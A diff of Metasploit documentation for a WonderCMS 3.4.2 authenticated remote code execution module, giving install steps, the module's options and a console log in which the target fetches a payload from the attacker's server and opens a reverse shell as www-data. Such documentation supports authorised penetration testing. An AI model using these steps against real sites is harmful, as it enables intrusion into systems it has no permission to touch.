|
1 | 1 | ## Vulnerable Application |
2 | 2 |
|
3 | | -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install |
4 | | -files, as well as instructions on installing/configuring the environment if it is different than a |
5 | | -standard install. Much of this will come from the PR, and can be copy/pasted. |
| 3 | +[WonderCMS](https://www.wondercms.com/) is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application: |
| 4 | + |
| 5 | +1. Install Apache2 and PHP on server |
| 6 | +2. Download WonderCMS from [here](https://github.com/WonderCMS/wondercms/releases/download/3.4.2/wondercms-342.zip) |
| 7 | +3. Enable Apache2 Rewrite Engine: `sudo a2enmod rewrite` |
| 8 | + |
6 | 9 |
|
7 | 10 | ## Verification Steps |
8 | | -Example steps in this format (is also in the PR): |
9 | 11 |
|
10 | 12 | 1. Install the application |
11 | | -1. Start msfconsole |
12 | | -1. Do: `use [module path]` |
13 | | -1. Do: `run` |
14 | | -1. You should get a shell. |
| 13 | +2. Start msfconsole |
| 14 | +3. Do: `use multi/http/wondercms_rce` |
| 15 | +4. Do: `set PASSWORD [password]' |
| 16 | +5. Do: `set LHOST [attacker IP]` |
| 17 | +6. Do: `set LPORT [attacker PORT]` |
| 18 | +4. Do: `run` |
| 19 | +5. You should get a shell. |
15 | 20 |
|
16 | 21 | ## Options |
17 | | -List each option and how to use it. |
18 | 22 |
|
19 | | -### Option Name |
| 23 | +### PASSWORD |
20 | 24 |
|
21 | | -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. |
| 25 | +WonderCMS generates one global password that gets generated upon first run of application. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access. |
22 | 26 |
|
23 | 27 | ## Scenarios |
24 | | -Specific demo of using the module that might be useful in a real world scenario. |
25 | | - |
26 | | -### Version and OS |
27 | 28 |
|
28 | 29 | ``` |
29 | | -code or console output |
| 30 | +msf6 exploit(multi/http/wondercms_rce) > set LHOST 192.168.168.152 |
| 31 | +LHOST => 192.168.168.152 |
| 32 | +msf6 exploit(multi/http/wondercms_rce) > set LPORT 4444 |
| 33 | +LPORT => 4444 |
| 34 | +msf6 exploit(multi/http/wondercms_rce) > exploit |
| 35 | +[*] Exploit running as background job 28. |
| 36 | +[*] Exploit completed, but no session was created. |
| 37 | +msf6 exploit(multi/http/wondercms_rce) > |
| 38 | +[*] Started reverse TCP handler on 192.168.168.152:4444 |
| 39 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 40 | +[*] Target is probably WonderCMS.. |
| 41 | +[+] The target is vulnerable. Version 3.4.2 is affected |
| 42 | +[*] Using URL: http://192.168.168.152:8082/81k4.zip |
| 43 | +[*] Received request, sending payload.. |
| 44 | +[*] Server stopped. |
| 45 | +[*] Command shell session 5 opened (192.168.168.152:4444 -> 192.168.168.146:37068) at 2025-04-25 14:46:20 +0200 |
| 46 | +
|
| 47 | +msf6 exploit(multi/http/wondercms_rce) > sessions 5 |
| 48 | +[*] Starting interaction with 5... |
| 49 | +
|
| 50 | +whoami |
| 51 | +www-data |
| 52 | +id |
| 53 | +uid=33(www-data) gid=33(www-data) groups=33(www-data) |
30 | 54 | ``` |
31 | 55 |
|
32 | | -For example: |
33 | | - |
34 | | -To do this specific thing, here's how you do it: |
35 | | - |
36 | | -``` |
37 | | -msf > use module_name |
38 | | -msf auxiliary(module_name) > set POWERLEVEL >9000 |
39 | | -msf auxiliary(module_name) > exploit |
40 | | -``` |
|
0 commit comments